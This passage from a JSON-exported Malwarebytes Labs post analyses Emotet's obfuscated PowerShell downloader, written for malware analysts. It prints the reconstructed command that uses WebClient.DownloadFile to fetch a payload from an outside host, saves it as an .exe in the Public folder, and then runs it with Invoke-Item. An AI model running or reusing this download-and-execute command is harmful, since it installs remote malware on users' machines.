srcset=\"https:\/\/blog.malwarebytes.com\/wp-content\/uploads\/2018\/06\/pic13.png 833w, https:\/\/blog.malwarebytes.com\/wp-content\/uploads\/2018\/06\/pic13-300x61.png 300w, https:\/\/blog.malwarebytes.com\/wp-content\/uploads\/2018\/06\/pic13-600x121.png 600w\" sizes=\"auto, (max-width: 833px) 100vw, 833px\" \/><\/p>\n<h4>$SDC<\/h4>\n<p><strong>$SDC = $env:public + &#8216;&#8217; + $NSB + (&#8216;.exe&#8217;);<\/strong><\/p>\n<p>This variable puts together the absolute path for the payload, complete with the file name that is generated by variable NSB.<\/p>\n<p><img loading=\"lazy\" decoding=\"async\" data-attachment-id=\"24092\" data-permalink=\"https:\/\/blog.malwarebytes.com\/threat-analysis\/2018\/06\/malware-analysis-decoding-emotet-part-2\/attachment\/pic14\/\" data-orig-file=\"https:\/\/blog.malwarebytes.com\/wp-content\/uploads\/2018\/06\/pic14.png\" data-orig-size=\"974,50\" data-comments-opened=\"1\" data-image-meta=\"{&quot;aperture&quot;:&quot;0&quot;,&quot;credit&quot;:&quot;&quot;,&quot;camera&quot;:&quot;&quot;,&quot;caption&quot;:&quot;&quot;,&quot;created_timestamp&quot;:&quot;0&quot;,&quot;copyright&quot;:&quot;&quot;,&quot;focal_length&quot;:&quot;0&quot;,&quot;iso&quot;:&quot;0&quot;,&quot;shutter_speed&quot;:&quot;0&quot;,&quot;title&quot;:&quot;&quot;,&quot;orientation&quot;:&quot;0&quot;}\" data-image-title=\"pic14\" data-image-description=\"\" data-medium-file=\"https:\/\/blog.malwarebytes.com\/wp-content\/uploads\/2018\/06\/pic14-300x15.png\" data-large-file=\"https:\/\/blog.malwarebytes.com\/wp-content\/uploads\/2018\/06\/pic14-600x31.png\" class=\"aligncenter size-full wp-image-24092\" src=\"https:\/\/blog.malwarebytes.com\/wp-content\/uploads\/2018\/06\/pic14.png\" alt=\"\" width=\"974\" height=\"50\" srcset=\"https:\/\/blog.malwarebytes.com\/wp-content\/uploads\/2018\/06\/pic14.png 974w, https:\/\/blog.malwarebytes.com\/wp-content\/uploads\/2018\/06\/pic14-300x15.png 300w, https:\/\/blog.malwarebytes.com\/wp-content\/uploads\/2018\/06\/pic14-600x31.png 600w, https:\/\/blog.malwarebytes.com\/wp-content\/uploads\/2018\/06\/pic14-965x50.png 965w\" sizes=\"auto, (max-width: 974px) 100vw, 974px\" \/><\/p>\n<p>We have already looked at the $ADCX variable and how to extract the URIs out of it. Now let\u2019s reconstruct the entire command-line argument that is passed to the system for the malware to successfully download the payload, save it to local file, and execute it.<\/p>\n<p>Here\u2019s the way the code is executed by the malware using variables we analyzed above:<\/p>\n<p><img loading=\"lazy\" decoding=\"async\" data-attachment-id=\"24093\" data-permalink=\"https:\/\/blog.malwarebytes.com\/threat-analysis\/2018\/06\/malware-analysis-decoding-emotet-part-2\/attachment\/pic15\/\" data-orig-file=\"https:\/\/blog.malwarebytes.com\/wp-content\/uploads\/2018\/06\/pic15.png\" data-orig-size=\"512,72\" data-comments-opened=\"1\" data-image-meta=\"{&quot;aperture&quot;:&quot;0&quot;,&quot;credit&quot;:&quot;&quot;,&quot;camera&quot;:&quot;&quot;,&quot;caption&quot;:&quot;&quot;,&quot;created_timestamp&quot;:&quot;0&quot;,&quot;copyright&quot;:&quot;&quot;,&quot;focal_length&quot;:&quot;0&quot;,&quot;iso&quot;:&quot;0&quot;,&quot;shutter_speed&quot;:&quot;0&quot;,&quot;title&quot;:&quot;&quot;,&quot;orientation&quot;:&quot;0&quot;}\" data-image-title=\"pic15\" data-image-description=\"\" data-medium-file=\"https:\/\/blog.malwarebytes.com\/wp-content\/uploads\/2018\/06\/pic15-300x42.png\" data-large-file=\"https:\/\/blog.malwarebytes.com\/wp-content\/uploads\/2018\/06\/pic15.png\" class=\"aligncenter size-full wp-image-24093\" src=\"https:\/\/blog.malwarebytes.com\/wp-content\/uploads\/2018\/06\/pic15.png\" alt=\"\" width=\"512\" height=\"72\" srcset=\"https:\/\/blog.malwarebytes.com\/wp-content\/uploads\/2018\/06\/pic15.png 512w, https:\/\/blog.malwarebytes.com\/wp-content\/uploads\/2018\/06\/pic15-300x42.png 300w\" sizes=\"auto, (max-width: 512px) 100vw, 512px\" \/><\/p>\n<p>Let\u2019s clean up the code to make it more readable:<\/p>\n<p><img loading=\"lazy\" decoding=\"async\" data-attachment-id=\"24094\" data-permalink=\"https:\/\/blog.malwarebytes.com\/threat-analysis\/2018\/06\/malware-analysis-decoding-emotet-part-2\/attachment\/pic16\/\" data-orig-file=\"https:\/\/blog.malwarebytes.com\/wp-content\/uploads\/2018\/06\/pic16.png\" data-orig-size=\"550,108\" data-comments-opened=\"1\" data-image-meta=\"{&quot;aperture&quot;:&quot;0&quot;,&quot;credit&quot;:&quot;&quot;,&quot;camera&quot;:&quot;&quot;,&quot;caption&quot;:&quot;&quot;,&quot;created_timestamp&quot;:&quot;0&quot;,&quot;copyright&quot;:&quot;&quot;,&quot;focal_length&quot;:&quot;0&quot;,&quot;iso&quot;:&quot;0&quot;,&quot;shutter_speed&quot;:&quot;0&quot;,&quot;title&quot;:&quot;&quot;,&quot;orientation&quot;:&quot;0&quot;}\" data-image-title=\"pic16\" data-image-description=\"\" data-medium-file=\"https:\/\/blog.malwarebytes.com\/wp-content\/uploads\/2018\/06\/pic16-300x59.png\" data-large-file=\"https:\/\/blog.malwarebytes.com\/wp-content\/uploads\/2018\/06\/pic16.png\" class=\"aligncenter size-full wp-image-24094\" src=\"https:\/\/blog.malwarebytes.com\/wp-content\/uploads\/2018\/06\/pic16.png\" alt=\"\" width=\"550\" height=\"108\" srcset=\"https:\/\/blog.malwarebytes.com\/wp-content\/uploads\/2018\/06\/pic16.png 550w, https:\/\/blog.malwarebytes.com\/wp-content\/uploads\/2018\/06\/pic16-300x59.png 300w\" sizes=\"auto, (max-width: 550px) 100vw, 550px\" \/><\/p>\n<p>Now that we know the value that these variables hold, let\u2019s reconstruct the final command-line arguments that will be passed to the system for execution:<\/p>\n<p><img loading=\"lazy\" decoding=\"async\" data-attachment-id=\"24095\" data-permalink=\"https:\/\/blog.malwarebytes.com\/threat-analysis\/2018\/06\/malware-analysis-decoding-emotet-part-2\/attachment\/pic17\/\" data-orig-file=\"https:\/\/blog.malwarebytes.com\/wp-content\/uploads\/2018\/06\/pic17.png\" data-orig-size=\"974,129\" data-comments-opened=\"1\" data-image-meta=\"{&quot;aperture&quot;:&quot;0&quot;,&quot;credit&quot;:&quot;&quot;,&quot;camera&quot;:&quot;&quot;,&quot;caption&quot;:&quot;&quot;,&quot;created_timestamp&quot;:&quot;0&quot;,&quot;copyright&quot;:&quot;&quot;,&quot;focal_length&quot;:&quot;0&quot;,&quot;iso&quot;:&quot;0&quot;,&quot;shutter_speed&quot;:&quot;0&quot;,&quot;title&quot;:&quot;&quot;,&quot;orientation&quot;:&quot;0&quot;}\" data-image-title=\"pic17\" data-image-description=\"\" data-medium-file=\"https:\/\/blog.malwarebytes.com\/wp-content\/uploads\/2018\/06\/pic17-300x40.png\" data-large-file=\"https:\/\/blog.malwarebytes.com\/wp-content\/uploads\/2018\/06\/pic17-600x79.png\" class=\"aligncenter size-full wp-image-24095\" src=\"https:\/\/blog.malwarebytes.com\/wp-content\/uploads\/2018\/06\/pic17.png\" alt=\"\" width=\"974\" height=\"129\" srcset=\"https:\/\/blog.malwarebytes.com\/wp-content\/uploads\/2018\/06\/pic17.png 974w, https:\/\/blog.malwarebytes.com\/wp-content\/uploads\/2018\/06\/pic17-300x40.png 300w, https:\/\/blog.malwarebytes.com\/wp-content\/uploads\/2018\/06\/pic17-600x79.png 600w, https:\/\/blog.malwarebytes.com\/wp-content\/uploads\/2018\/06\/pic17-965x129.png 965w\" sizes=\"auto, (max-width: 974px) 100vw, 974px\" \/><\/p>\n<p>This is what it comes down to in the end:<\/p>\n<p><strong>(New-Object) System.Net.WebClient.&#8221;DownloadFile&#8221;(http:\/\/lecap-services.fr\/wiB9s.&#8221;ToString&#8221;(), C:USersPublic264415.exe);<\/strong><\/p>\n<p>The command we have above will initiate the download of the data from the specified URI and save it to a local file as \u201cC:USersPublic264415.exe\u201d.<\/p>\n<p><strong>(&#8216;Invoke-Item&#8217;)(C:USersPublic264415.exe);<\/strong><\/p>\n<p>And this final command will start the execution of the payload.<\/p>\n<h3>Emotet: a complex malware<\/h3>\n<p><a href=\"https:\/\/blog.malwarebytes.com\/detections\/trojan-emotet\/\" target=\"_blank\" rel=\"noopener\">Emotet<\/a> is one of the most active threats seen in the wild, with campaigns serving this malware daily to potential victims across the globe. The level of code obfuscation and encryption used to hide the code is quite complex and well-executed. In fact, it is one of the most complex downloaders in circulation.<\/p>\n<p>That&#8217;s why we felt it was so important to help audiences understand Emotet in sufficient detail so that code variations or other changes in the future do not pose any major challenges to analysts trying to decode this malware. The more you know, the better and faster you are able to protect users from sophisticated malware attacks.<\/p>\n<p>The post <a rel=\"nofollow\" href=\"https:\/\/blog.malwarebytes.com\/threat-analysis\/2018\/06\/malware-analysis-decoding-emotet-part-2\/\">Malware analysis: decoding Emotet, part 2<\/a> appeared first on <a rel=\"nofollow\" href=\"https:\/\/blog.malwarebytes.com\">Malwarebytes Labs<\/a>.<\/p>\n<p><a href=\"https:\/\/blog.malwarebytes.com\/threat-analysis\/2018\/06\/malware-analysis-decoding-emotet-part-2\/\" target=\"bwo\" >https:\/\/blog.malwarebytes.com\/feed\/<\/a><\/p>\n","protected":false},"excerpt":{"rendered":"<p><strong>Credit to Author: Vishal Thakur| Date: Thu, 07 Jun 2018 15:00:00 +0000<\/strong><\/p>\n<table cellpadding='10'>\n<tr>\n<td valign='top' align='center'><a href='https:\/\/blog.malwarebytes.com\/threat-analysis\/2018\/06\/malware-analysis-decoding-emotet-part-2\/' title='Malware analysis: decoding Emotet, part 2'><img src='https:\/\/blog.malwarebytes.com\/wp-content\/uploads\/2018\/05\/shutterstock_248596792.jpg' border='0'  width='300px'  \/><\/a><\/td>\n<\/tr>\n<tr>\n<td valign='top' align='left'>In part two of our series on decoding Emotet, we analyze the PowerShell code flow and structure. We also reconstruct the command-line arguments\u2014for fun!<\/p>\n<p>Categories: <\/p>\n<ul class=\"post-categories\">\n<li><a href=\"https:\/\/blog.malwarebytes.com\/category\/threat-analysis\/malware-threat-analysis\/\" rel=\"category tag\">Malware<\/a><\/li>\n<li><a href=\"https:\/\/blog.malwarebytes.com\/category\/threat-analysis\/\" rel=\"category tag\">Threat analysis<\/a><\/li>\n<\/ul>\n<p>Tags: <a href=\"https:\/\/blog.malwarebytes.com\/tag\/code-analysis\/\" rel=\"tag\">code analysis<\/a><a href=\"https:\/\/blog.malwarebytes.com\/tag\/downloader\/\" rel=\"tag\">downloader<\/a><a href=\"https:\/\/blog.malwarebytes.com\/tag\/emotet\/\" rel=\"tag\">emotet<\/a><a href=\"https:\/\/blog.malwarebytes.com\/tag\/encryption\/\" rel=\"tag\">encryption<\/a><a href=\"https:\/\/blog.malwarebytes.com\/tag\/powershell\/\" rel=\"tag\">powershell<\/a><\/p>\n<table width='100%'>\n<tr>\n<td align=right>\n<p><b>(<a href='https:\/\/blog.malwarebytes.com\/threat-analysis\/2018\/06\/malware-analysis-decoding-emotet-part-2\/' title='Malware analysis: decoding Emotet, part 2'>Read more&#8230;<\/a>)<\/b><\/p>\n<\/td>\n<\/tr>\n<\/table>\n<\/td>\n<\/tr>\n<\/table>\n<p>The post <a rel=\"nofollow\" href=\"https:\/\/blog.malwarebytes.com\/threat-analysis\/2018\/06\/malware-analysis-decoding-emotet-part-2\/\">Malware analysis: decoding Emotet, part 2<\/a> appeared first on <a rel=\"nofollow\" href=\"https:\/\/blog.malwarebytes.com\">Malwarebytes Labs<\/a>.<\/p>\n","protected":false},"author":4,"featured_media":0,"comment_status":"open","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"colormag_page_container_layout":"default_layout","colormag_page_sidebar_layout":"default_layout","footnotes":""},"categories":[10488,10378],"tags":[16201,11382,15715,10439,3764,11191,10494],"class_list":["post-12508","post","type-post","status-publish","format-standard","hentry","category-malwarebytes","category-security","tag-code-analysis","tag-downloader","tag-emotet","tag-encryption","tag-malware","tag-powershell","tag-threat-analysis"],"_links":{"self":[{"href":"https:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/posts\/12508","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/users\/4"}],"replies":[{"embeddable":true,"href":"https:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/comments?post=12508"}],"version-history":[{"count":0,"href":"https:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/posts\/12508\/revisions"}],"wp:attachment":[{"href":"https:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/media?parent=12508"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/categories?post=12508"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/tags?post=12508"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}